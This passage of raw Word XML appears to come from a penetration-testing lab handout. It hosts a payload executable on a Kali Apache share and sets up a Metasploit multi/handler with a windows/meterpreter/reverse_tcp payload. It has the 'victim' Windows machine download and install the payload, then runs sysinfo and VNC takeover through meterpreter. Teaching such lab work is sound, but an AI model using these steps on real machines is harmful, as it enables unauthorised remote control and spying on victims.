                <v:shape id="Shape 11593" o:spid="_x0000_s1029" style="position:absolute;top:3505;width:46664;height:1752;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="4666488,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lnvsQA&#10;AADeAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWsCMRC9C/0PYQrealZFqatRpKAsrUJr9T5spptt&#10;N5MlSXX9941Q8DaP9zmLVWcbcSYfascKhoMMBHHpdM2VguPn5ukZRIjIGhvHpOBKAVbLh94Cc+0u&#10;/EHnQ6xECuGQowITY5tLGUpDFsPAtcSJ+3LeYkzQV1J7vKRw28hRlk2lxZpTg8GWXgyVP4dfq2AX&#10;1vvv0XF2Kvh9bLbT7m37Wnil+o/deg4iUhfv4n93odP84WQ2hts76Qa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ZZ77EAAAA3gAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m,l4666488,r,175260l,175260,,e" fillcolor="yellow" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,4666488,175260"/>
                </v:shape>
                <v:shape id="Shape 11594" o:spid="_x0000_s1030" style="position:absolute;top:5257;width:50581;height:1753;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="5058156,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7iXsccA&#10;AADeAAAADwAAAGRycy9kb3ducmV2LnhtbERPS2sCMRC+F/ofwgheRLNKW3RrlFLYUi8FH6jH6Wbc&#10;pN1MtptUt//eFAq9zcf3nPmyc7U4UxusZwXjUQaCuPTacqVgty2GUxAhImusPZOCHwqwXNzezDHX&#10;/sJrOm9iJVIIhxwVmBibXMpQGnIYRr4hTtzJtw5jgm0ldYuXFO5qOcmyB+nQcmow2NCzofJz8+0U&#10;fK3f3z6Oh9XA6MHK2tm+mL5khVL9Xvf0CCJSF//Ff+5XneaP72d38PtOukE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4l7HHAAAA3gAAAA8AAAAAAAAAAAAAAAAAmAIAAGRy&#10;cy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACMAwAAAAA=&#10;" path="m,l5058156,r,175260l,175260,,e" fillcolor="yellow" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,5058156,175260"/>
                </v:shape>
                <v:shape id="Shape 11595" o:spid="_x0000_s1031" style="position:absolute;top:7010;width:24749;height:1753;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="2474976,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PaNcUA&#10;AADeAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9C/0PyxR6MxstSk1dpZYWRE9GBY9DdpqE&#10;7s6m2W1M/fWuIPQ2j/c582Vvjeio9bVjBaMkBUFcOF1zqeCw/xy+gPABWaNxTAr+yMNy8TCYY6bd&#10;mXfU5aEUMYR9hgqqEJpMSl9UZNEnriGO3JdrLYYI21LqFs8x3Bo5TtOptFhzbKiwofeKiu/81yow&#10;uDPmsPm45P74fPrZrmXXrDqlnh77t1cQgfrwL7671zrOH01mE7i9E2+Qi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E9o1xQAAAN4AAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m,l2474976,r,175260l,175260,,e" fillcolor="yellow" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,2474976,175260"/>
                </v:shape>
                <v:shape id="Shape 11596" o:spid="_x0000_s1032" style="position:absolute;top:8763;width:17708;height:1752;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="1770888,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NDmcQA&#10;AADeAAAADwAAAGRycy9kb3ducmV2LnhtbERPTUvDQBC9C/6HZQRvdlPB0MZuSykUBL2ktuBxyE6T&#10;tNmZsLsm0V/vCoK3ebzPWW0m16mBfGiFDcxnGSjiSmzLtYHj+/5hASpEZIudMBn4ogCb9e3NCgsr&#10;I5c0HGKtUgiHAg00MfaF1qFqyGGYSU+cuLN4hzFBX2vrcUzhrtOPWZZrhy2nhgZ72jVUXQ+fzoCc&#10;3/LyY/iW00Iu13yoxtfS18bc303bZ1CRpvgv/nO/2DR//rTM4feddIN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jQ5nEAAAA3gAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m,l1770888,r,175260l,175260,,e" fillcolor="yellow" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,1770888,175260"/>
                </v:shape>
                <v:shape id="Shape 11597" o:spid="_x0000_s1033" style="position:absolute;top:10515;width:426;height:1753;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="42672,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F2L8QA&#10;AADeAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9C/0PyxS86UalrUZXEWmhpCe1gschO2ZD&#10;srMhu42pv94tFLzN433OatPbWnTU+tKxgsk4AUGcO11yoeD7+DGag/ABWWPtmBT8kofN+mmwwlS7&#10;K++pO4RCxBD2KSowITSplD43ZNGPXUMcuYtrLYYI20LqFq8x3NZymiSv0mLJscFgQztDeXX4sQq+&#10;3uWxqjJ9rrNbtz+ZaTbTOlNq+NxvlyAC9eEh/nd/6jh/8rJ4g7934g1yf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1Bdi/EAAAA3gAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m,l42672,r,175260l,175260,,e" fillcolor="yellow" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,42672,175260"/>
                </v:shape>
                <v:shape id="Shape 11598" o:spid="_x0000_s1034" style="position:absolute;top:12268;width:17907;height:1752;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="179070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5WkscA&#10;AADeAAAADwAAAGRycy9kb3ducmV2LnhtbESPQW/CMAyF75P2HyIjcRspk9igIyC0gsRtAnrY0WpM&#10;W9E4VZJB4dfPh0m72XrP731ergfXqSuF2Ho2MJ1koIgrb1uuDZSn3cscVEzIFjvPZOBOEdar56cl&#10;5tbf+EDXY6qVhHDM0UCTUp9rHauGHMaJ74lFO/vgMMkaam0D3iTcdfo1y960w5alocGePhuqLscf&#10;Z6AIZbl9n9Wbw/78Ze+PRaG/T4Ux49Gw+QCVaEj/5r/rvRX86WwhvPKOzKB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ouVpLHAAAA3gAAAA8AAAAAAAAAAAAAAAAAmAIAAGRy&#10;cy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACMAwAAAAA=&#10;" path="m,l1790700,r,175260l,175260,,e" fillcolor="yellow" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,1790700,175260"/>
                </v:shape>
                <v:shape id="Shape 11599" o:spid="_x0000_s1035" style="position:absolute;top:14020;width:54330;height:1753;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="543306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FN878A&#10;AADeAAAADwAAAGRycy9kb3ducmV2LnhtbERPSwrCMBDdC94hjOBO0wqKVqNoQXDrZ9Pd0IxttZmU&#10;Jmq9vREEd/N431ltOlOLJ7WusqwgHkcgiHOrKy4UXM770RyE88gaa8uk4E0ONut+b4WJti8+0vPk&#10;CxFC2CWooPS+SaR0eUkG3dg2xIG72tagD7AtpG7xFcJNLSdRNJMGKw4NJTaUlpTfTw+joNnJLL0c&#10;61t8vlnW12mWzuNMqeGg2y5BeOr8X/xzH3SYH08XC/i+E26Q6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AU3zvwAAAN4AAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMvZG93bnJl&#10;di54bWxQSwUGAAAAAAQABAD1AAAAhAMAAAAA&#10;" path="m,l5433060,r,175260l,175260,,e" fillcolor="yellow" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,5433060,175260"/>
                </v:shape>
                <v:shape id="Shape 11600" o:spid="_x0000_s1036" style="position:absolute;top:15773;width:35768;height:1753;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="3576828,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RoBMUA&#10;AADeAAAADwAAAGRycy9kb3ducmV2LnhtbESPQU/DMAyF70j7D5GRdmPJ0FRBWTYxBBJIu7DyA6zG&#10;NN0ap2rStfx7fEDiZsvP771vu59Dp640pDayhfXKgCKuo2u5sfBVvd09gEoZ2WEXmSz8UIL9bnGz&#10;xdLFiT/pesqNEhNOJVrwOfel1qn2FDCtYk8st+84BMyyDo12A05iHjp9b0yhA7YsCR57evFUX05j&#10;sDCNx4+NP1eZxnCMhX80/lC9Wru8nZ+fQGWa87/47/vdSf11YQRAcGQGv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JGgExQAAAN4AAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m,l3576828,r,175260l,175260,,e" fillcolor="yellow" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,3576828,175260"/>
                </v:shape>
                <v:shape id="Shape 11601" o:spid="_x0000_s1037" style="position:absolute;top:17526;width:32811;height:1752;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="3281172,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ShXMQA&#10;AADeAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9F/wPywi91d2UEiW6Cda21KtWRG9DdkyC&#10;2dk0u9X477sFobd5vM9ZFINtxYV63zjWkEwUCOLSmYYrDbuvj6cZCB+QDbaOScONPBT56GGBmXFX&#10;3tBlGyoRQ9hnqKEOocuk9GVNFv3EdcSRO7neYoiwr6Tp8RrDbSuflUqlxYZjQ40drWoqz9sfq+Fw&#10;vKXlav/y+t2+89s6GLWZfp61fhwPyzmIQEP4F9/daxPnJ6lK4O+deIP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oVzEAAAA3gAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m,l3281172,r,175260l,175260,,e" fillcolor="yellow" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,3281172,175260"/>
                </v:shape>
                <v:shape id="Shape 11602" o:spid="_x0000_s1038" style="position:absolute;top:19278;width:26121;height:1753;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="2612136,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nSbsUA&#10;AADeAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9F/wPywi91U08pJq6SlFKCxVFW+h1mp1m&#10;Q7OzIbvG6K93BcHbPN7nzBa9rUVHra8cK0hHCQjiwumKSwXfX29PExA+IGusHZOCE3lYzAcPM8y1&#10;O/KOun0oRQxhn6MCE0KTS+kLQxb9yDXEkftzrcUQYVtK3eIxhttajpMkkxYrjg0GG1oaKv73B6tg&#10;ff5cb1bmkG7lJuvIPf9Mp7/vSj0O+9cXEIH6cBff3B86zk+zZAzXd+INc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SdJuxQAAAN4AAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m,l2612136,r,175260l,175260,,e" fillcolor="yellow" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,2612136,175260"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>kali@kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">:~$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>chown</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -R </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>www-data</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>:www</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>-data</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">/www/html/share </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>kali@kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">:~$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>cp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> /home/kali/Desktop/deskcapt.exe /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">/www/html/share </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>kali@kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">:~$ service apache2 start </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>kali@kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">:~$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="237" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="-15" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">msf6 &gt; use multi/handler </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="237" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="829" w:hanging="10"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>msf6</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit(multi/handler) &gt; set payload windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> msf6 exploit(multi/handler) &gt; set LHOST 10.0.2.15 msf6 exploit(multi/handler) &gt; set LPORT 3333 msf6 exploit(multi/handler) &gt; exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:ind w:right="396"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="8657" w:type="dxa"/>
        <w:tblInd w:w="398" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="246" w:type="dxa"/>
          <w:left w:w="29" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8657"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A715A6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8657" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C0C0C0"/>
          </w:tcPr>
          <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Go to your Windows (Victim Machine) </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Browser </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Wingdings" w:eastAsia="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t></w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> 10.0.2.15/share </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Click on the Payload Exe file and Install </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:right="396"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="5" w:line="237" w:lineRule="auto"/>
        <w:ind w:left="730" w:right="-15" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Computer        : WIN_USER-PC </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &gt; run </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vnc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="237" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="3" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">VNC is Virtual Network Computing, (a GUI based desktop sharing utility). It uses Remote Frame Buffer Protocol. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
